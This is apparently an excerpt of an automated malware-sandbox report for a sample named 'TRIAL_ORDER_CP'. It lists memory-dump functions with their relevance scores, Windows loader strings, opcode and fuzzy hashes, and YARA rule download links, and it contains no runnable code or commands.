                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@
                                          • API String ID: 0-380025441
                                          • Opcode ID: 359d298145a37ed0e182d57fde37a6a330ef77884dbdf7a79558c819db7b8875
                                          • Instruction ID: 5198e829e8c501587d66e15c9baf4d9721de821255a433f1eee37bf9d006d7a6
                                          • Opcode Fuzzy Hash: 359d298145a37ed0e182d57fde37a6a330ef77884dbdf7a79558c819db7b8875
                                          • Instruction Fuzzy Hash: D031A1B5909301AFD750CF28C880A5BBBE8FB85654F480A3EF9D887250D734DD18DBA6
                                          Function 33B433D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpInitializeAssemblyStorageMap, xrefs: 33B8289A
                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 33B8289F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                          • API String ID: 0-2653619699
                                          • Opcode ID: 111a3b90e0c533bc150ddfa726b46274835505d289dd4cfe9a2c17d5da8a7cba
                                          • Instruction ID: 351dd1f85799d01574707c2afdfd7ab78757970609baaebb29d91757e4a01731
                                          • Opcode Fuzzy Hash: 111a3b90e0c533bc150ddfa726b46274835505d289dd4cfe9a2c17d5da8a7cba
                                          • Instruction Fuzzy Hash: D2112972B00314BFFB158A48DD41FAB76A8DFC4790F58843AB908DF244DA75CD0097A4
                                          Function 33B1C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: 782dd0d8cc6799fa251bfdcb3f0fcca3b7e2cd1540d7549a092486bed20d7064
                                          • Instruction ID: 8b0dede443d8e8b874d64dc85b658c049263339c5c3fca65d1da61ac18154619
                                          • Opcode Fuzzy Hash: 782dd0d8cc6799fa251bfdcb3f0fcca3b7e2cd1540d7549a092486bed20d7064
                                          • Instruction Fuzzy Hash: 9D825BB9E003189FEB24CFA9C881BADB7B5FF48790F14817AD859AB250DB309D55CB50
                                          Function 33B11051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 553b8344d79b989f91630d6f049f1fdb46f62f8d4a9c07100b9e28c1895ead11
                                          • Instruction ID: 29b1105db1f24d231e782bf197f127786780602f03cc64b26f9769dabe0b3280
                                          • Opcode Fuzzy Hash: 553b8344d79b989f91630d6f049f1fdb46f62f8d4a9c07100b9e28c1895ead11
                                          • Instruction Fuzzy Hash: CAB1F1B5A093808FD354CF28C480A5AFBE1FB89348F584A6EF899D7352D771E945CB42
                                          Function 33B17623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6b49ab12d5dadad66469e82949df087bf9060867a2c02451672d02461403bbf5
                                          • Instruction ID: eb50cf60d3cfcc13089dc6cce93709842714329f896c0f03829070253f2fe770
                                          • Opcode Fuzzy Hash: 6b49ab12d5dadad66469e82949df087bf9060867a2c02451672d02461403bbf5
                                          • Instruction Fuzzy Hash: 31614E75E00656AFDB08DF68C481A9DFBB5FF88344F24827AE559E7340DB30A9518BD0
                                          Function 33B14779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: e56d5aa6558ef93342e3a9d1b63bdca462f16684a59ab886090c00703d3f2a88
                                          • Instruction ID: 4ca31ac81f23e7980bf9dba53c8f03c0bbcf4af7a73008ea72dbc84920ff9921
                                          • Opcode Fuzzy Hash: e56d5aa6558ef93342e3a9d1b63bdca462f16684a59ab886090c00703d3f2a88
                                          • Instruction Fuzzy Hash: 9141D175A003918FD311CF28D894F2ABBF9EF81364F18453DE9458B2A0DBB0D9A5CB91
                                          Function 33B156E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 996e25bd6db9543377be7868b1c190f4f7fd90c08d570e3d85b22873a83ad260
                                          • Instruction ID: 5247d0a1ee0c6fb683f64538c29324afed2099a939126fd391ac4543ea08a797
                                          • Opcode Fuzzy Hash: 996e25bd6db9543377be7868b1c190f4f7fd90c08d570e3d85b22873a83ad260
                                          • Instruction Fuzzy Hash: 8031AC3AB15B15FFE7468B24CA90F89BBA5FF84250F445066E85087F50DB35E830CB90
                                          Function 33BBE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 037979fe8e9e608faf1346eae700bfb67b1157a3d84215b68352ce34cc40139b
                                          • Instruction ID: cad0edf15a9c5c5d31009b6b675da6bc4df961dd0de5d6498a1a9725d49ee06e
                                          • Opcode Fuzzy Hash: 037979fe8e9e608faf1346eae700bfb67b1157a3d84215b68352ce34cc40139b
                                          • Instruction Fuzzy Hash: 223169B59053518FCB04DF19D94095ABBF5FB89254F0886AEE498DB221DB30ED05CF92
                                          Function 33B13536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 06cea8ef48d2f61985356dae12a8ad2c7017c24f78d7a86b010e70fcd4d569c7
                                          • Instruction ID: da6be9d3c2cfe39b854b9eaab7dce5b0b1b045cdc006209d6bcdcb9aa6a8eaa4
                                          • Opcode Fuzzy Hash: 06cea8ef48d2f61985356dae12a8ad2c7017c24f78d7a86b010e70fcd4d569c7
                                          • Instruction Fuzzy Hash: 5B2136359057509FE362AF04C984F0ABBE5FFC0B64F450179E8898B645D770EC58CBA1
                                          Function 33B9A130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: d798125cabb788933cd8ec369e21e27cdb6dc49544e245425815a83a1736addc
                                          • Instruction ID: ef64d971e46333f2ad8cf0648e8091a473789cbd20b559a7595bb194de2e6287
                                          • Opcode Fuzzy Hash: d798125cabb788933cd8ec369e21e27cdb6dc49544e245425815a83a1736addc
                                          • Instruction Fuzzy Hash: 87014936611269EBEF029E84C940EDA7B66FF4C754F068121FE1866220C636D971EB80
                                          Function 33B092AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: e8b21c90a1cf631df879018408e37973836866b624ae297b2af21acd32b1f03c
                                          • Instruction ID: 8fa489c549898837efe3e88650cf06a4baa90a1a83d60e80b1c056f47c7eb79c
                                          • Opcode Fuzzy Hash: e8b21c90a1cf631df879018408e37973836866b624ae297b2af21acd32b1f03c
                                          • Instruction Fuzzy Hash: 54F09A32600744AFD7319B59CC08F9ABBEDEF84B10F180629A546935A1D7A1E909CA60
                                          Function 33B4A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: 6c9aa7b7cdf1116735f294879cc9b3ada6122ec370abbbb9fb1c2c22ef33b75e
                                          • Instruction ID: 34c7ce3e2d58d621c7576e74e1480e58097b06168835eac006de46683a4bc28e
                                          • Opcode Fuzzy Hash: 6c9aa7b7cdf1116735f294879cc9b3ada6122ec370abbbb9fb1c2c22ef33b75e
                                          • Instruction Fuzzy Hash: C67149B9E013AD9BEB14CF98D580BDDBBB2FB48350F14813AE905AB244EB358941CB50
                                          Function 33B1965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                          • Instruction ID: bacaf0ed998a5be1f69b009742d4871e478b8f245083d5fd95c021dd979e0f0c
                                          • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                          • Instruction Fuzzy Hash: 43614A76D01359ABEF11CFA5C840BDEBBB8EF84750F14417AE861AB250DB749E11CBA0
                                          Function 33B202F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #%u
                                          • API String ID: 0-232158463
                                          • Opcode ID: 4d38ccede8a0acb1a1e78bc4e641e09cc62421fec77bba814f548833ae794c71
                                          • Instruction ID: 5a811292de82d61403c8112daefce90d72b53ae005415847a61e8a1249175d0a
                                          • Opcode Fuzzy Hash: 4d38ccede8a0acb1a1e78bc4e641e09cc62421fec77bba814f548833ae794c71
                                          • Instruction Fuzzy Hash: 0F713971E002599FDB05CFA8D984FAEBBF8FF08744F144165E914EB651EA34EA41CBA0
                                          Function 33B441BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                          • Instruction ID: 2893b6d429b9761544cf52e9dfee821226e41ebba6e17102dd336411efc3bc13
                                          • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                          • Instruction Fuzzy Hash: A2516971505710AFD321CF19C840E6BBBE8FF48710F008A2AF9959B6A0E7B4E954CB95
                                          Function 33B8C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 22c85cfebfba251c64845dd6096ef15e6dfc20714cb51846b600a63f86b480c1
                                          • Instruction ID: 64af85d166412b388781ef35fe0202597617f1868b0f76e65bd7fbb684a245af
                                          • Opcode Fuzzy Hash: 22c85cfebfba251c64845dd6096ef15e6dfc20714cb51846b600a63f86b480c1
                                          • Instruction Fuzzy Hash: 584141F2D0126DABEB21DA50CC81FDEB77CAB44714F0445B5EA09AB140DB709E888FA4
                                          Function 33B4360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Flst
                                          • API String ID: 0-2374792617
                                          • Opcode ID: 43598915fafa4531fe39a1582aa1bd6fb7694b78a67c63e8be26a98a419b8280
                                          • Instruction ID: 51885cc8017d7a6eb050fd47f6cc4bca5b53eade532c261463b7399ebbfa882e
                                          • Opcode Fuzzy Hash: 43598915fafa4531fe39a1582aa1bd6fb7694b78a67c63e8be26a98a419b8280
                                          • Instruction Fuzzy Hash: A54197B1609312DFD304CF18C580A16FBE5EB89754F98827EE498CF281DB71D986CBA5
                                          Function 33B8C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 79fbc38385b610c3988feb9ec09a7835d72fb9ee5e3ee6a60cf33d3ec163daf8
                                          • Instruction ID: 3e196f86ae5af92ff26418a6b786ce0b1dc7680cefcac6cb8c673f8280f5f88c
                                          • Opcode Fuzzy Hash: 79fbc38385b610c3988feb9ec09a7835d72fb9ee5e3ee6a60cf33d3ec163daf8
                                          • Instruction Fuzzy Hash: D031C3FE901659AFEB16CB58C845E6FF7B8EB80760F154539E904AB650D7309E04C7E0
                                          Function 33B6717A Relevance: .7, Instructions: 705COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a6ee5842fbab1cf46c7e5561e7a16fd3eba5999320f6e3c3cf653caffa532737
                                          • Instruction ID: b9951e6dc96931cae15bb53b5d263c4f53b2db9a7b1c73971c95121e5a017b49
                                          • Opcode Fuzzy Hash: a6ee5842fbab1cf46c7e5561e7a16fd3eba5999320f6e3c3cf653caffa532737
                                          • Instruction Fuzzy Hash: BD42B175A002268FDB04CF59C4919AEB7B6FF89358F18857DE456AB341DB34EC42CB90
                                          Function 33B3B1E0 Relevance: .6, Instructions: 629COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9656db246f80d66994d80b8cdd802a788695fdfc7b3268b152cc45af9a8025e5
                                          • Instruction ID: 1990649c08d5ea36703575ff5139f73b047a395f777763de2466418ccda0979e
                                          • Opcode Fuzzy Hash: 9656db246f80d66994d80b8cdd802a788695fdfc7b3268b152cc45af9a8025e5
                                          • Instruction Fuzzy Hash: 7A32B1B6E01229DBDF14CFA8C890BAEBBB1FF85754F190139E845AB394D7319911CB90
                                          Function 33B22760 Relevance: .6, Instructions: 605COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f81cadcda9c7bd329f47c36ca8ab64397ddcd667ea2a5f31ea890f7932e13e0
                                          • Instruction ID: 531a8eab8fd35b10b132776c674e74ce6c7c413015645fda068d602995580fcf
                                          • Opcode Fuzzy Hash: 9f81cadcda9c7bd329f47c36ca8ab64397ddcd667ea2a5f31ea890f7932e13e0
                                          • Instruction Fuzzy Hash: FF32C074A007688FEB24CF69C850BAEBBF6EF84744F54413DD8999B684DB34E941CB50
                                          Function 33BD124C Relevance: .6, Instructions: 571COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9da4148282a594379b9b9148a4fefd3e6f56a0dbca41d11a38cd922df108c29
                                          • Instruction ID: f67ee6946ffa710130c62a6f759f05503c57333168039d8e0d0b976faa640d7f
                                          • Opcode Fuzzy Hash: b9da4148282a594379b9b9148a4fefd3e6f56a0dbca41d11a38cd922df108c29
                                          • Instruction Fuzzy Hash: B6229175A002268FDB49CF58C490AAEB7B6FF88354F18817DD855EB345DB34E942CB90
                                          Function 33B08347 Relevance: .4, Instructions: 380COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf3a9110f48324a516e96e26c6e907ede9996ecaef0f0aa56a415f55a81af7c2
                                          • Instruction ID: 1a4ecf110c480c250737ea452b8bb94bbe7596eee607d3a0060fc375bb77d6b0
                                          • Opcode Fuzzy Hash: cf3a9110f48324a516e96e26c6e907ede9996ecaef0f0aa56a415f55a81af7c2
                                          • Instruction Fuzzy Hash: 1AD1E072A0072A9BEB04CF65C880EAE7BB5FF84349F494139E955DB291EB30DA45CF50
                                          Function 33B1D700 Relevance: .3, Instructions: 342COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0396fcb9f3c7e09c93767e495baed97fdd7e94aea6eb64663bc9d582510b2b9c
                                          • Instruction ID: 263eb8e29e1061e0abc8b19b7b19bce95dd259efbff892918ffd7f24a2cdc312
                                          • Opcode Fuzzy Hash: 0396fcb9f3c7e09c93767e495baed97fdd7e94aea6eb64663bc9d582510b2b9c
                                          • Instruction Fuzzy Hash: C3C1A475E003269BEB14CF59C840BADB7B5EF44394F58827DE868AB290D770E952CBD0
                                          Function 33B51763 Relevance: .3, Instructions: 322COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ee81fb718893236c7ef46414f6d2da655e5a0911935d45da85a44e3890846de
                                          • Instruction ID: 6f7e40cbd6816c2b1d5443516707059a249d0c3ffe52c8812ff3d08e8f613640
                                          • Opcode Fuzzy Hash: 3ee81fb718893236c7ef46414f6d2da655e5a0911935d45da85a44e3890846de
                                          • Instruction Fuzzy Hash: 81D1E2B5A012149FEB51CF68C980B9A7BE9FF09340F1441BAED49DF216EB31D945CBA0
                                          Function 33B2F380 Relevance: .3, Instructions: 321COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
